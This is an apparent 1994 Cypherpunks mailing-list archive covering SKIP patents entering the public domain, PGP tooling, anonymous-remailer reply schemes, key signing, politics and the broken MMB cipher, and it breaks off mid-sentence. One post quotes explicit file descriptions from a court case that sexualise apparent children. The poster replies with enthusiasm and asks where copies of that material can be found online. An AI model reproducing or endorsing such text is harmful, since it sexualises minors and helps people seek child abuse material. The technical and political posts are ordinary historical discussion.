hks.net Mon Dec 5 23:53:35 1994 From: cactus at hks.net (L. Todd Masco) Date: Mon, 5 Dec 94 23:53:35 PST Subject: Patents to be placed in PD Message-ID: <199412060758.CAA07429@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- This appeared on the IPSEC list (Hooray!). jwlowe at IBM followed up by announce the dedication of IBM's patent #5,148,479 to the public. Is this the apocalypse or something? Never have I seen such signs of rationality in companies of this size. - ------- start of forwarded message (RFC 934 encapsulation) ------- From: Ashar.Aziz at eng.sun.com (Ashar Aziz) Newsgroups: hks.lists.ipsec Subject: SKIP patents will be in public domain Date: 5 Dec 1994 15:44:20 -0500 Lines: 17 Sender: root at bb.hks.net Message-ID: <9412051928.AA25371 at miraj.Eng.Sun.COM> NNTP-Posting-Host: bb.hks.net I am happy to state that Sun management has asked me to make the following statement regarding the SKIP patents. 1. The SKIP patents (when they issue) will be placed in the public domain. Anyone may use it if they wish, with no rights or dues pertaining to Sun. There will be no need to license SKIP patent rights. 2. Sun Microsystems did this to help the industry make progress in the area of security. We view this as an indication of our willingness to promote open standards. I thank all of you who publicly commented on this issue, because your comments helped bring about this change in Sun's policy. Regards, Ashar. - ------- end ------- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuQZaioZzwIn1bdtAQH/AAGAtvm78gyEj6C+kWfogHJjuMdr7MGW634Z 9n4cYfkPb6G0bmlzMv7Y0X7MAcLwuJk7 =Ux5s -----END PGP SIGNATURE----- From wcs at anchor.ho.att.com Tue Dec 6 00:12:16 1994 From: wcs at anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204) Date: Tue, 6 Dec 94 00:12:16 PST Subject: public accounts / PGP / passphrases Message-ID: <9412052048.AA08276@anchor.ho.att.com> Adam wrote: > Derek wrote: > | It would be nice to integrate PGP into terminal emulators, too, like > | kermit or seyon or red ryder or whatever, so that you could easily use > | PGP locally to sign/encrypt things on the remote end. Wishful > | thinking, I guess... > > I think terminal emulators are the wrong layer for PGP > integration. PGP support is needed in document editors and viewers, > rather than in network layers. The terminal emulator we used to use at Bell Labs, ctrm, was designed to let you interact conveniently between your DOS machine and a Unix system you were dialed into; it felt like you were controlling things from the Unix end. Thus, you could issue Unix commands to initiate file transfer via kermit or xmodem (utopc *, pctou *), and you could also issue Unix commands to run DOS commands back on the PC - the commands basically sent back and escape sequence saying ESC RUN foo.exe arg arg arg CR or whatever. It was easy to build applications that did things like crunch up mail messages into temp files, download the file to DOS, run Lotus or WordStar on it, and haul the result back. You could take the same approach with PGP if you wanted - the support you need in document viewers is the ability to hand chunks of the document/mail message off to an arbitrary program for processing. Coincidentally (:-), MIME lets you do this sort of thing. I don't know if ctrm is still around - it was designed by an employee and we were allowed to use it internally, but I don't think it was sold outside. But it wouldn't be too hard to add that sort of capability to your favorite source-included freeware terminal emulator, and then you could build convenient PGP tolls, remote Mosaic viewers, etc. out of it. Bill From lmccarth at ducie.cs.umass.edu Tue Dec 6 00:26:07 1994 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Tue, 6 Dec 94 00:26:07 PST Subject: Freeport information Message-ID: <199412060831.DAA07772@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- Michelle Montpetite writes (forwarded by Sam Kaplin): > Anonymous users have read-only access (e.g. they cannot > post to the bulletin boards nor send e-mail); [...] > Prerequisite software > > FreePort is distributed in source code. You will need > typical Unix program development tools including an C > compiler, yacc, and linker. The publicly available > layered software mentioned above is available from > various ftp sites on the internet, (where ?) > or is available from CWRU as a complete collection of the prerequisite > source code. (where ?) [...] > Installation and maintenance of the FreePort software > requires an experienced Unix Systems Programmer. The > technical support person requires 'root' access to > install and configure the various prerequisite > communications software. [...] > Licensing > > A 5-year renewable FreePort 2.3 license for a nonprofit > site is $850 ($2800 for-profit). The software is > shipped as a "tar" file on 8mm Exabyte cartridge, or > for extra cost, on 1/2" magnetic tape or DC6150 > cartridge. I'm still not clear about what's free and what costs eight hundred bucks. > The software is AS IS. Stupid is as stupid does ? Zen and the art of software maintenance. - - -L. Futplex McCarthy; PGP key by finger or server "We've got computers, we're tapping phone lines; I know that that ain't allowed" --Talking Heads - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLuQf4Gf7YYibNzjpAQEBxwP/QuZ5dkFDpJvMJAWNyqvUd02XudTq+Fod mrPmnY/2JxoxpHbXwbVs6BFvV1R3iEg+/0NpumQxSZYV9bcN5o7yBm5LSjCFurIW 2NkDbAaaEG6e9rV3efzhFO2FCe2jmrcXPkUVIGLORxMJ3oS7cZyYBpZNDidN+fOP z9lBWln7MC4= =h+xK - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuQhISoZzwIn1bdtAQFdeAF/SJVofZS/anhfZe8RkuxJajt1xQZV/aZR n8B66+zP0aCMXZhfdMU2u/udI5LTCcLG =RsyI -----END PGP SIGNATURE----- From MIKEINGLE at delphi.com Tue Dec 6 00:30:59 1994 From: MIKEINGLE at delphi.com (Mike Ingle) Date: Tue, 6 Dec 94 00:30:59 PST Subject: One-shot remailer replies Message-ID: <01HKB4JDI40290QGGZ@delphi.com> >>The remailers need a one-time reply mechanism. > >>This would enable many other things, including "persistent" anonymous >>entities, without using broadcast techniques. The current remailers >>encourage hit-and-run anonymity, like the recent burst of anonymous >>nastiness, and discourage conversational anonymity and persistent >>anonymous entities. Sending a one-way message is easy and fairly secure. > >Bill Stewart pointed out some of the problems with one-shot reply >addresses, although he seemed to be analyzing them as features which the >remailers provided against the users's will. I think Mike's idea was >that this is something which remailer users would like. Still, Bill's >comments seem valid. How useful is a single-use reply address? If you >posted a message to a mailing list or newsgroup only the first person >would get through to you. You could post a message with a list of >reply addresses but that would open up some traffic analysis problems. Yes, they are supposed to be voluntary and created by the user in advance. I don't want mandatory replyability, just to make conversation easier. As for replies from a list or newsgroup, use the pigeonholes. Anonymous reply is an enabling primitive for all kinds of servers and anonymous mechanisms. >>One way to do this: each remailer has a list of secret (symmetric) keys. >>Each secret may have an expiration date. By some method (problem discussed >>later) the user and the remailer establish a shared secret, adding it to the >>list, while the remailer does not find out who the user is. The reply ticket >>contains a series of nested hops, each encrypted with that remailer's secret >>plus all the others after it. >As you have seen, this model is very similar to Chaum's 1981 paper except >for where the secret keys come from. This is not to disparage your ideas >but it's just that as long as we have giants around, we might as well >stand on their shoulders. Chaum's system was considerably simpler as it >used ordinary PK decryption of the address at each stage, with the header >including a secret key that would encrypt the body to maintain >unlinkability. As you point out this has a certain kind of vulnerability >to coercion that your scheme is less sensitive to. Chaum's system isn't too different if the remailers generate new keys on a regular basis. That would forcably expire reply tickets when the keys were changed, whether they had been used or not. >>The catch: how do we establish a shared secret with the remailer, without >>identifying ourselves to it? If the first remailer (the one the replyer >>sends the ticket to) is corrupt, and it knows who established the secret >>contained in the ticket, it knows the end-to-end path of the message. >> Problem: remailers are coerced or hacked to decrypt a captured secret- >> establishing message, before the secret key is expired. Trail of a reply >> ticket can then be followed. Solution: no good one that I can think of. >We tend not to worry so much about this forward vulnerability as we do >about the reverse one. Partially this is because our current remailers >don't implement Chaum's scheme, but partially too we sense that an >interesting public pseudonym is a more inviting target than the hopefully >anonymous true name behind it. I'm not really sure how good an >assumption this is, though. So I am less inclined to view Chaum's scheme >as broken since the remailer network inherently suffers the same >vulnerabilities. We hope to develop enough independent remailers that >the coercion issue will not be a major problem. True, outside traffic analysis is the major problem, as long as there are enough hops to withstand a few bad remailers. Forward (source capture) vulnerability is harder to stop. >Tim May has advocated >hardware, tamper-proof circuits to hold the keys so that coercion is >impossible. Yes, but I actually want to build this thing. Fairly soon even. >Plus, I think an important part of the picture which is not currently >being implemented is remailer key changes. This can provide forward >secrecy similar to your scheme. Once last week's key is gone, there is >no longer any danger of your message ever being traced (as long as you >trust the remailer to truly erase it, just as in your scheme). This >would be useful both for ordinary remailing and for Chaum-style reply >blocks, which as I say are both vulnerable to the reply-with-coercion >attack. Better is perhaps a three-day key with one overlap, that is, a current key and one "last key" kept around at all times. >There is one attack on all these schemes which you didn't mention, which is >that the bad guys are the first one to try the return address and coerce >each remailer along the way. This might be especially dangerous in the >case of your "pigeonhole" described below, where the pigeonhole account >makes for a tempting target for the snoopers, giving them a chance to >intercept the reply message back to you and be the first ones to be using >it. True, the path has to be there, or the message can't go. I can't think of a fix for that one, can you? Mostly I just don't want an endlessly growing amount of information out there. I want old information to die after a while, as keys are erased or expired. [ DH exchange / Key broadcast approach ] Broadcasting a list of keys is one possibility; what if someone else uses the same key? Birthday theorem makes this hard to prevent. >>Given a secure two-way messaging mechanism, persistent anonymous identities >>are established using a "pigeonhole service". This is a service, with a >>publicized address, that will accept public-key encrypted mail and store it >>in a "pigeonhole". The owner of the pigeonhole anonymously sends a request >>(with authentication) and a reply ticket. The pigeonhole service sends the >>owner his mail using the ticket. > >This is a good idea, although there is a tradeoff between frequent polls >of the pigeonhole, which might allow some traffic analysis particularly >if there is a suspected link between persona and true name, and less >frequent checks, which may cause high priority messages to be delayed. Pigeonhole holds a one-time reply address. Every week or two it expires and you send a new one. If a mail comes in, it uses it, and you send a new one. >>The non-anonymous user could reply with any mail reader, send the message >>back to the remailer that sent it to him, and the message would be >>transported securely back to the anonymous user that sent it. > >Yes, well, we do this already with our current remailers. Many >people have written clients to create these reply blocks, along with >little instructions to the baffled recipient to cut and past the reply >block at the front of the reply message. Once in a while these even >work, I think. >With your pigeonhole idea you don't need this, you can just have a >Reply-To that points at the pigeonhole, which is one of its biggest >advantages. Methinks I'd make it a little more robust than the existing systems (easy with perl) like being able to grep out a reply header anywhere in the message, ignore > indentation, and similar safety precautions. >>For reliability in a large remailer network, end-to-end reliability is >>better than point-to-point reliability. Messages should be m-of-n secret >>shared before transmission, and reassembled at the terminal end. For >>clientless reception, the terminal node remailer could do the reassembly >>and splitting of replies. > >I agree with this. This also relates to issue of message size >quantization with cryptographically strong padding. I don't suppose the >RSAREF library could do that... >Yes, this is a good idea. I first read about this in the 1993 Crypto >conference proceedings, in a paper called "Secret Sharing Made Short" by >Hugo Krawczyk. You might find the paper useful although it sounds very >similar to what you have in mind already. RSAREF is useful for public key and DH. Secret sharing we have to get for ourselves. I looked at Shade v1.0, and it seems to be broken on little-endian machines. It works on an HP-UX machine, but fails on a PC running linux with small-endian enabled in shade.h. The half-hour setup delay is not encouraging, either. Your SECSPLIT is nice and simple, but each shade is the size of the message. What I need is an error-correcting protocol to build a no-growth secret splitter. >Considering all the pros and cons, I am afraid that even the security of >the one-shot return address is probably insufficient, especially when the >simple "post replies to usenet encrypted with this key" is so easy and >safe. Granted it will be a problem once everybody starts doing that, but >flooding is going to be hard to beat for safety. Yes, broadcast is the most secure, but it has a fundamental problem: security scales linearly with bandwidth. If you have a pool of 100 users and one of them gets a message, your uncertainty is 1 in 100. I've tried without success to figure out a broadcast mechanism where security scales faster than linearly with bandwidth. Any system with a unique path is subject to an attack where each element of the path is examined in turn. If the path forks and sends to several people, the security is enhanced only to the extent that more people are annoyed. We need a mechanism where there is either a circulating data stream or a large file on a server. An incoming message alters the data somehow, diffusing the changes over a large area. A request for information selects out some transformation of the selected data in such a way that the server cannot correlate the incoming message with the outgoing message. I don't see any way to do this. Elimination of the replay traffic-analysis problem is major progress. As for step-by-step coercion back to the source, I don't see a fix, and we will probably have to live with that unless there is a major breakthrough. Mike From shamrock at netcom.com Tue Dec 6 00:33:12 1994 From: shamrock at netcom.com (Lucky Green) Date: Tue, 6 Dec 94 00:33:12 PST Subject: Are there *any* internet services runnable from powerpc Message-ID: Tom wrote: >I have a power mac 7100 with an ethernet port to the internet. Does anyone >know if I could, for example, get scripts for Eudora to snarf mail and run >a keyserver, or set up an anon remailer, or do anything at all remotely >cool and for the betterment of the crypto/privacy/pgp/etc. services >available to the internet public? I could leave my mac on 24/7 serving up >services. When I'm debugging code it might crash, but I suppose there >should be fail-safe systems. > >It doesn't seem like I can do much unless I buy a unix emulator, and I >don't have the money for that. I'm a student. Yeah, A/UX is rather overpriced. But you don't need it for a web site. Your PPC can provide any Web service your heart desires without you having to buy A/UX. You can open an HTTP server using the excellent MacHTTP, a ftp site using Peter Lewis' MacFTP, etc. You can even use perl on the Mac using MacPerl, the list goes on. All these programs are available at your friendly neighbourhood InfoMac mirror site. I am not so sure about the keyserver, though. I suppose it might be possible to write an AppleScript for the new scriptable versions of MacPGP and Eudora, but I don't think it would be worth the effort. There are enough keyservers out there. IMHO, the best source of info regarding running your own web server on a Mac is the MacHTTP mailing list. You can join by sending a message to listserv at oac3.hsc.uth.tmc.edu with "SUBSCRIBE MACHTTP_TALK Your Name" in the body of the message. Also check the MacHTTP home page for announcements and frequently asked questions and answers. It can be found at: http://www.uth.tmc.edu/mac_info/machttp_info.html Enjoy, -- Lucky Green PGP encrypted mail preferred. From cdodhner at PrimeNet.Com Tue Dec 6 00:41:43 1994 From: cdodhner at PrimeNet.Com (Christian Odhner) Date: Tue, 6 Dec 94 00:41:43 PST Subject: MIT Keysigner CA In-Reply-To: <199412031813.KAA17366@largo.remailer.net> Message-ID: On Sat, 3 Dec 1994, Eric Hughes wrote: > From: Christian Odhner > > I trust a key to be an introducer if and when > I am sure that a signature by that key means that the signed key belongs > to the identity (be it "real" or a 'nym) it claims to represent. > > There is a qualitative difference between a real identity and a > pseudonym identity. A real identity has a body attached to it and a > pseudonym identity does not. The phrase "belongs to" cannot be used > in the same sense for both of these, and the failure to discriminate > between them is a fallacy. I understand the difference and was not attempting to equate the two, just save a few words.. :) > As far as an MIT autosigner, the signature will simply represent a > reduction to the trustability of the MIT account assignment procedure. > This is not a reduction to bodily identity and should not be construed > as such. That's the point I was trying to make, only you said it a little better. > Derek.) The signature here represents an attestation that a given key > (that is, a given identity) can be reached through a particular > mailbox. *THAT* is the usefullness that I hadn't realized. Thanks for pointing it out. Happy Hunting, -Chris. ______________________________________________________________________________ Christian Douglas Odhner | "The NSA can have my secret key when they pry cdodhner at primenet.com | it from my cold, dead, hands... But they shall pgp 2.3 public key by finger | NEVER have the password it's encrypted with!" cypherpunks WOw dCD Traskcom Team Stupid Key fingerprint = 58 62 A2 84 FD 4F 56 38 82 69 6F 08 E4 F1 79 11 ------------------------------------------------------------------------------ From skaplin at skypoint.com Tue Dec 6 00:43:52 1994 From: skaplin at skypoint.com (Samuel Kaplin) Date: Tue, 6 Dec 94 00:43:52 PST Subject: Valid mail -> usenet gateway for alt.security.keydist Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Does anyone have a valid mail -> usenet gateway for alt.security.keydist? I've tried a few and they don't seem to work. ============================================================================== No doubt Jack the Ripper excused himself on the grounds that it was human nature. --A. A. Milne-- ============================================================================== skaplin at skypoint.com | "...vidi vici veni" - Overheard | outside a Roman brothel. PGP encrypted mail is accepted and | preferred. | Change is the only constant in the | Universe..."Four quarters, please." E-mail key at four11.com for PGP Key or | Finger skaplin at mirage.skypoint.com | Smile!! Big brother is watching. ============================================================================== -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBLuQjC8lnXxBRSgfNAQHiCwf9FDGkO/yt74Zn0zRE5P23cxBo7pfHr7i3 g3HFJD5kp0b8kUXsj2UwN9X5E6L/9gDED2fyiWbdnh/Q2v75wFGVBusmUwCE4Xgs cTS97xOBLAXCr/snXcZD96Zw3hpGsiNASXKwPtTfflNpKxuEaOSYBPpyaGjHr6gs nFbLitYEVgq51SuKZGO3lYMrUc5kkTLhMBPUk7YxeBmnDaEBduDqSuQrApAw5GwK lcgYVNK2SW69GaCWWqAn2NQsSROVSQlaiiVRIPTKPxV9/5basGfZNKhJpgepBPSY cSplbGwVb7DfcAXD9yu0yXBimiNHbBeuamS8Cm+9eamxD9ZD2vuzbQ== =/aF3 -----END PGP SIGNATURE----- This message digitally signed to verify the identity of the writer. From anon at losers.hacktic.nl Tue Dec 6 03:10:28 1994 From: anon at losers.hacktic.nl (anon at losers.hacktic.nl) Date: Tue, 6 Dec 94 03:10:28 PST Subject: no subject (file transmission) Message-ID: <199412061111.AA16360@xs1.xs4all.nl> Remailed by: anon at losers.hacktic.nl X-Remailer-Software: Remail for Waffle 1.4 > > Could someone bring me up to speed on this group? On the surface, it > would seem that there is a lot in common with their objectives and the > general Cypherpunks "philosophy". (quotes because I understand the > diversity of thought in this group.) Posted earlier: > From nobody at soda.BErkeley.EDU Wed Aug 3 11:12:35 PDT 1994 > Article: 17449 of alt.privacy > Xref: netcom.com alt.privacy:17449 > Path: netcom.com!netcomsv!decwrl!spool.mu.edu!cass.ma02.bull.com!soda.BErkeley.EDU!nobody > From: nobody at soda.BErkeley.EDU (Tommy the Tourist, Anon User) > Newsgroups: alt.privacy > Subject: OCEANIA GETS SCREWED! > Date: 28 Jul 1994 20:47:23 -0000 > Organization: Bull Worldwide Information Systems. > Lines: 65 > Sender: daemon at cass.ma02.bull.com > Distribution: world > Message-ID: <199407282045.NAA24571 at soda.Berkeley.EDU> > NNTP-Posting-Host: cass.ma02.bull.com > Status: RO > > > From CompuServe's Libertarian Political Issues Forum > > > Subject: #216752-Oceania? > From: Scott A. Kjar 70402,3124 > To: L D Weller 71011,1743 > > It turned out to all be a scam, actually. The key people involved, Eric > Kline and Chuck Geshlieder, allegedly had a scheme set up where they > repeatedly paid themselves out of all of the proceeds. It apparently went > something like this: > > 1) Donations came to Oceania. Kline and Geshlider, as principals, got > paid a portion. > > 2) Oceania then contracted with The Gold Standard Press, owned by Kline > and Geshlider, to do printing. Kline got a share as the sales rep. > > 3) Gold Standard Press then printed fund-raising letters for Oceania. > Kline and Geshlider split the profits, as partners in Gold Standard. > > 4) Oceania sent out more fund-raising requests. > > 5) Donations came to Oceania. (see #1) > > It fell apart when Kline and Geshlider allegedly accused each other of > fraud, and Geshlider apparently took his case to the Nevada State Attorney > General's Consumer Fradu Division. (Poor Chuck, there were no consumer's > in this transaction.) What is amazing about all of this is that The Gold > Standard was an ILLEGAL business (no business license) and Chuck had been > hauled before a judge a few months ago on this very charge. He allegedly > threatened to beat her up in the parking lot (something he has threatened > to virtually everyone who has ever met him), and then skipped town for a > couple of weeks. The people at the Attorney General's office apparently > were astounded that Chuck, who is knowlingly running an illegal business, > and is not keeping any records the IRS might get hold of, is complaining > about his business partner and co-conspirator about a scam. After all, > there are NO Gold Standard Press records, and there are NO Oceania > records. (It turns out that Kline was simply writing checks Pay To The > Order of Cash, and then using the cash to cover his reversals in the Stock > Market.) > > Eventually, their need for cash apparently outstripped the rate at which > suckers were sending them money, and like hungry wolves, set upon each > other. > > GOOD RIDDANCE! > > p.s. I know both of these jerks personally. We have tried to throw them > out of the LP in Las Vegas for several years. Like counterfeit money, > they just keep turning up! > > > ------------ > To respond to the sender of this message, send mail to > remailer at soda.berkeley.edu, starting your message with > the following 7 lines: > :: > Response-Key: ideaclipper > > ====Encrypted-Sender-Begin==== > MI@```$!S^P;+]AB?X9TW6\8W2:NP&2&04%GSR=BW]`^+`=)MFOA[ER>?SK)G > 8$I$XG.1&][YD$P&3*E2?3N6*&SLZ:_5^ > ====Encrypted-Sender-End==== > > From usura at xs4all.nl Tue Dec 6 03:31:43 1994 From: usura at xs4all.nl (Alex de Joode) Date: Tue, 6 Dec 94 03:31:43 PST Subject: Valid mail -> usenet gateway for alt.security.keydist Message-ID: <199412061132.AA18904@xs1.xs4all.nl> In article you stated: : Does anyone have a valid mail -> usenet gateway for alt.security.keydist? : I've tried a few and they don't seem to work. You can use the {usura,remailer}@xs4all.nl for that, instead of Anon-Post-To: , use the header Post-To: alt.security.keydist , (it will -not- be anonymised, if you use simple Post-To: ). A detailed help-file is available by sending mail to this address with a "Subject: remailer-help". Hope this helps, -- Exit! Stage Left. Alex de Joode From jkreznar at ininx.com Tue Dec 6 03:46:05 1994 From: jkreznar at ininx.com (John E. Kreznar) Date: Tue, 6 Dec 94 03:46:05 PST Subject: Shrinking government In-Reply-To: <9412051130.1.17207@cup.portal.com> Message-ID: <9412061145.AA15280@ininx> -----BEGIN PGP SIGNED MESSAGE----- H. Keith Henson writes > It may be that a general cutting down on the powers of the Federal > Government is in order. How could you doubt it? > This has pros and cons, Name a con. > and support (in some areas) even from the RR. That's ok. Without a government to wield, they would be ignorable. > How *does* one shrink the unshrinkable? Tax revolts (in the > form of massive political pressure) seem to come about when the tax > rates get as high as they are now. Tax revolts do no good. Taxes are the _result_, not the cause. The cause of big government is popular gratuitous acceptance of government favor. If you want to shrink government, you've got to begin by changing the minds of a hundred million of your neighbors who think it's civilized to take a government job or contract, accept social security, apply for an SBA loan or FEMA assistance, and on down the list. I know a tax revolter who held an anti-tax rally on a tax-funded picnic ground without even noticing or acknowledging the inconsistency. This is why it's unshrinkable. We have met the enemy, and he is us. John E. Kreznar | Relations among people to be by jkreznar at ininx.com | mutual consent, or not at all. -----BEGIN PGP SIGNATURE----- Version: 2.3a iQCVAgUBLuRNEsDhz44ugybJAQHpIgP/a3fFhRrub8X3KQu5EHYy94+nsfOu788b Mv2yXisQSEBjUR41IIU7ieTzq5B9nPHY3D2wWJ70EQmZOJ2bWQl1HMosoRSwd3eL oNZQvu+DPsvZFAge/BQyFjCDaQCme9Xm+rXC8psqGmGT9avQE7ti+OSEnFQ+lSJj FYv/Lj69vlM= =4m98 -----END PGP SIGNATURE----- From jamesd at netcom.com Tue Dec 6 06:52:11 1994 From: jamesd at netcom.com (James A. Donald) Date: Tue, 6 Dec 94 06:52:11 PST Subject: AABBS Conviction relation to child porn? In-Reply-To: <0098881E.4950521B.51@INS.INFONET.NET> Message-ID: <199412061451.GAA16613@netcom18.netcom.com> ED KELLY writes > "AA-8278.GIF" described as "FULL SCREEN VIEW! > A HAIRLESS PUSSY NAILED TO A TABLE!", > > "AA-7153.GIF" described as "MOTHER IS WATCHING > HER DAUGHTER FUCK BIG COCK! NO TITS!", > > "AA-8682.GIF" described as "HE MAKES HIS DAUGHTER > SUCK COCK! SHE IS FISTING HER SISTER!", and > > "AA-11935.GIF" described as "HE FUCKS HIS DAUGHTERS > HAIRLESS CUNT!" SHE FISTS HER MOTHER!" > > -------------------------- > > COUNT 4: > > "AA-15198.GIF" described as "BLONDE LOLITA HAS NO TITS! > SUCKS HUGE COCK AND DRINKS SPERM!" Sounds great. Are there any copies of the evidence available on the net? And please lay off the capital letters. It is rude to shout. -- --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.comorg From LAURENN%smtpgate at earth.wri.org Tue Dec 6 07:46:07 1994 From: LAURENN%smtpgate at earth.wri.org (LAURENN%smtpgate at earth.wri.org) Date: Tue, 6 Dec 94 07:46:07 PST Subject: Interesting WWW Profile site... Message-ID: <9412061103.aa23116@earth.wri.org> From: Gleason Sackman ("SACKMAN at PLAINS.NODAK.EDU") To: net-happenings at is.internic.net Date: Tuesday, December 6, 1994 10:56 am Subject: WWW> Profile Registry (fwd) (SMTP Id#: 596) ---------- Forwarded message ---------- SENDER: "Geo. A. Jacobs" Subject: WWW> Profile Registry Date: 2 Dec 1994 15:46:00 -0800 New on the Internet. A place to post your personal profile. http://snark.wizard.com/wwpr.html The one feature that is available on the on-line services, and missing on the Internet. Register your personal profile with: World-Wide Profile Registry (WWPR) Tell the world: Where to find you (email address) About your personal interests and hobbies Where you live (City, State, Country) A personal quote or favorite saying Alias that you use on irc And which channels you hang out in Your birthdate Occupation / Where you attend school Search the WWPR database: Keyword search to find any of the above that the registrant chooses to include in the profile. _____________________________________________________________________ There is NEVER a charge to search the WWPR database. Profile registration will be FREE to the first 2000 persons entering their profiles. Register today, let the world know who you are, what you are. http://snark.wizard.com/wwpr.html From jya at pipeline.com Tue Dec 6 08:52:26 1994 From: jya at pipeline.com (John Young) Date: Tue, 6 Dec 94 08:52:26 PST Subject: NYT on N2 and Star Wars Message-ID: <199412061657.LAA11900@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- Two articles today on far-side Witten-Seiberg N2 Supersymmetry and Republican-hots Star Wars chemical laser weaponry: "Physicists Say New Math Tool Will Probe Secrets of Matters", by Malcolm W. Browne. For email copy send blank message with subject: N2_duh "From Fantasy to Fact: Space-Based Laser Nearly Ready to Fly", by William J. Broad. For copy, same, with subject: RAY_dem - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuSXyyoZzwIn1bdtAQFWZQF/fh3eH4+IB8DbDjdThlrkXexTA0niTfDV HqQkGJUiygJPLTantn68zc44nLpKcjfi =f1ux -----END PGP SIGNATURE----- From jcorgan at netcom.com Tue Dec 6 08:53:10 1994 From: jcorgan at netcom.com (Johnathan Corgan) Date: Tue, 6 Dec 94 08:53:10 PST Subject: MMB question Message-ID: -----BEGIN PGP SIGNED MESSAGE----- >What's the current thought on MMB? Has it undergone serious analysis >and if so, what's the conclusion been? In the errata to Applied Cryptography, Bruce Schneier makes the following comment, though nowhere did he elaborate on this: Pages 266-7: Since the publication of this book, MMB has been broken. Do not use this algorithm. ======================================================================= Johnathan Corgan "Violence is the last refuge of the incompetent" jcorgan at netcom.com -Isaac Asimov PGP Public Key: http://www-swiss.ai.mit.edu/~bal/pks-toplev.html Or send email to: pgp-public-keys at pgp.ai.mit.edu Subj: GET jcorgan ======================================================================= -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLuSWjE1Diok8GKihAQGXcgP/UBZjsglUif76J2BFehx6spAKkPpMtczH XWhszO/6auoC+t2FTnVwL8jmcGaJlLGNjcfUFLAsUl+OSKh+qAt/N/4D0IHBhy/l 5ClWOEButYupazyMaZMGgnurSlN8gjGeqUNcoJvVGC53cPbQ+ol5XhvutURWlxhJ zu2ygeKvC8c= =/iKd -----END PGP SIGNATURE----- From frissell at panix.com Tue Dec 6 09:11:21 1994 From: frissell at panix.com (Duncan Frissell) Date: Tue, 6 Dec 94 09:11:21 PST Subject: Shrinking government Message-ID: <199412061707.AA10549@panix.com> At 03:45 AM 12/6/94 PST, John E. Kreznar wrote: >Tax revolts do no good. Taxes are the _result_, not the cause. > >The cause of big government is popular gratuitous acceptance of >government favor. > >If you want to shrink government, you've got to begin by changing the >minds of a hundred million of your neighbors who think it's civilized to >take a government job or contract, accept social security, apply for an >SBA loan or FEMA assistance, and on down the list. I prefer to let "reality" change people's minds. The USSR didn't fall because millions were convinced that Milton Friedman was right and Karl Marx was wrong. What happened was that the changing circumstances of their lives made it obvious that the old ways could not be continued. Technology and "Market Earth"(tm) will convince people that "others government" is inferior to self government and the modern welfare-warfare state will fall. In retrospect, it will even look like it was inevitable (just like the fall of the commies). Wait 'till the Web + Digital Cash = a market growing so fast that even if the governments *had* to tools to control it, they couldn't be applied because it will have grown beyond the control points before the governments can move. The Market is The Blob (without Steve McQueen). "X The Unknown." DCF "You are a libertarian. You make choices and do what you think best for your life. Stop trying to prevent other people from behaving in the exact and natural way you behave." From rsalz at osf.org Tue Dec 6 09:16:47 1994 From: rsalz at osf.org (Rich Salz) Date: Tue, 6 Dec 94 09:16:47 PST Subject: RSAREF and TIPEM Message-ID: <9412061713.AA03009@sulphur.osf.org> In places where RSAREF and TIPEM overlap are the API's identical? Is it possible to build TIPEM on top of RSAREF? Does anyone have the API's on-line to email me? Thanks. From bshantz at spry.com Tue Dec 6 09:33:01 1994 From: bshantz at spry.com (bshantz at spry.com) Date: Tue, 6 Dec 94 09:33:01 PST Subject: MMB question Message-ID: <9412061728.AA04414@homer.spry.com> jcorgan writes to cypherpunks: >In the errata to Applied Cryptography, Bruce Schneier makes the following >comment, though nowhere did he elaborate on this: >Pages 266-7: Since the publication of this book, MMB has been >broken. Do not use this algorithm. How was it broken? Do we have any more details? Is there any more explanation? I'm just interested in seeing the analysis? >>>>>>>>>>>>>>>>>>>>>INTERNETWORKING THE DESKTOP<<<<<<<<<<<<<<<<<<<<<<< Brad Shantz bshantz at spry.com Senior Software Engineer SPRY Inc. Direct #: (206)-442-8251 316 Occidental Ave. S. Main #: (206)-447-0300 2nd Floor Fax #: (206)-447-9008 Seattle, WA 98104 WWW URL: http://WWW.SPRY.COM ------------------------------------------------------------- PGP Public Key at: http://www-swiss.ai.mit.edu/~bal/pks-toplev.html Or email: pgp-public-keys at pgp.ai.mit.edu Subj: GET bshantz >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>><<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< From huntting at glarp.com Tue Dec 6 09:51:59 1994 From: huntting at glarp.com (Brad Huntting) Date: Tue, 6 Dec 94 09:51:59 PST Subject: PGP MIME type (was Well now that we're signing...) In-Reply-To: <199412051953.LAA03423@netcom11.netcom.com> Message-ID: <199412061750.KAA11728@misc.glarp.com> > There is of course a draft by Nat Borenstein et al, but it is not an > official RFC yet. Ack! I spoke to soon. Your quite right. brad From p.v.mcmahon.rea0803 at oasis.icl.co.uk Tue Dec 6 10:04:43 1994 From: p.v.mcmahon.rea0803 at oasis.icl.co.uk (p.v.mcmahon.rea0803 at oasis.icl.co.uk) Date: Tue, 6 Dec 94 10:04:43 PST Subject: US Government Cryptographic Interfaces Meeting Message-ID: <9412061805.AA21938@getafix.oasis.icl.co.uk> I attach some (unofficial) notes on a recent meeting sponsored by the US government. Comments welcome. - pvm Ps. As I am in San Jose this week, I will try to get to the 10DEC94 Bay Area CP meeting where I can briefly talk about it if there is any interest. ----- Report from 